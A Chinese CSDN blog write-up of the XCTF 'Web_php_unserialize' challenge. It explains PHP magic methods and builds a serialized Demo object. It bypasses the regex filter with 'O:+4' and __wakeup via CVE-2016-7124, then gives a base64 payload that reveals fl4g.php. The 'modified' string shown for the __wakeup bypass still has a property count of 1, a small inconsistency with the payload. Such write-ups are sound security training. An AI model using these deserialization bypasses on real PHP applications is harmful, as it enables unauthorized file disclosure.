XCTF-Web_php_unserialize

最新推荐文章于 2022-11-28 14:53:05 发布

auxein

最新推荐文章于 2022-11-28 14:53:05 发布

阅读量424

点赞数

分类专栏： CTF-Web入门

本文链接：https://blog.csdn.net/weixin_45613760/article/details/108012356

版权

CTF-Web入门专栏收录该内容

6 篇文章 0 订阅

订阅专栏

题目

题目如下

可以看出来这是一道关于反序列化的题目

分析题目

看一下题目的代码

首先判断GET参数 “var” 是否存在，然后通过base64解码传入变量var，如果不存在就输出网页源码
对var进行一个正则过滤，如果通过正则过滤便会进行反序列化，否则响应信息’stop hacking!’

题目中出现的魔术方法

题目中存在一个demo类

__contrust()
见名知意，构造方法。具有构造方法的类会在每次创建新对象前调用此方法，该方法常用于完成一些初始化工作。
__destruct()
析构方法，当某个对象的所有引用都被删除或者当对象被显式销毁时，析构函数会被执行。
__wakeup()
是用在反序列化操作中。unserialize() 会检查存在一个 __wakeup() 方法。如果存在，则先会调用 __wakeup() 方法。 __wakeup() 经常用在反序列化操作中，例如重新建立数据库连接，或执行其它初始化操作。

解题思路

通过GET传入base64编码得参数且要绕过正则过滤
绕过 __wakeup()
解释，源码中提示flag在 fl4g.php 中，而使用调用 __wakeup() 会强制将 $file 变量复制为index.php

开始解题

序列化

代码如下

<?php 
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}

$a = new Demo('fl4g.php');
$b = serialize($a);
echo $b;
?>

运行后结果如下

O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}

绕过正则

该题正则匹配的规则如下:
在不区分大小写的情况下，若字符串出现 “o:数字” 或者 "c:数字’ 这样的格式，那么就被过滤。
我们传入得参数类型为对象 " O " ，又因为序列化字符串的格式为 参数格式:参数名长度 ，因此 " O:4 " 这样的字符串肯定无法通过正则匹配
这里利用了一个php反序列化的特性（感兴趣可以自行百度），需要注意的是在php7中这部分代码被修改了，无法使用。

获取php版本

使用dirsearch进行扫描

可以找到泄露的PHP信息

利用特性

反序列化操作 参数格式:参数名长度 时，当格式为 参数格式:+参数名长度 会返回同样的结果，故我们可以通过这个方法绕过正则过滤

O:+4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}

绕过__wakeup()

对应的CVE编号: CVE-2016-7124

存在漏洞的PHP版本: PHP5.6.25 之前版本和 7.0.10 之前的7.x版本
漏洞概述: __wakeup() 魔法函数被绕过,导致执行了一些非预期效果的漏洞
漏洞原理: 当对象的 属性(变量)数 大于实际的个数时, __wakeup() 魔法函数被绕过

故序列化结果修改如下

O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}

构造payload

题目中知道还需要进行base64编码
构造payload如下

?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

得到flag

注意点

需要注意的一点是private和protect属性的序列化

直接上代码

<?php
    class test{
        public $name="winny";
        private $age="8";
        protected $sex="female";
    }
    $a=new test();
    $a=serialize($a);
    print_r($a);
?>

序列化显示如下

O:4:"test":3:{s:4:"name";s:5:"winny";s:9:"testage";s:1:"8";s:6:"*sex";s:6:"female";}

private 分析：
这样就发现本来是 age结果上面出现的是 testage，而且 testage 长度为7，但是上面显示的是9
查找资料后发现 private 属性序列化的时候格式是 %00类名%00成员名，%00 占一个字节长度，所以 age 加了类名后变成了 testage 长度为9
protect 分析：
本来是 sex 结果上面出现的是 *sex，而且 *sex 的长度是4，但是上面显示的是6，同样查找资料后发现 protect属性序列化的时候格式是 %00*%00成员名

public(公共的):在本类内部、外部类、子类都可以访问
protect(受保护的):只有本类或子类或父类中可以访问
private(私人的):只有本类内部可以使用

这里我开始是采用手动序列化，一直没有成功。本菜狗还是使用脚本输出吧呜呜呜。

auxein

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
XCTF-Web_php_unserialize

题目题目如下可以看出来这是一道关于反序列化的题目分析题目看一下题目的代码首先判断GET参数 “var” 是否存在，然后通过base64解码传入变量var，如果不存在就输出网页源码对var进行一个正则过滤，如果通过正则过滤便会进行反序列化，否则响应信息’stop hacking!’题目中出现的魔术方法题目中存在一个demo类__contrust()见名知意，构造方法。具有构造方法的类会在每次创建新对象前调用此方法，该方法常用于完成一些初始化工作。__destruct()析构方
复制链接

扫一扫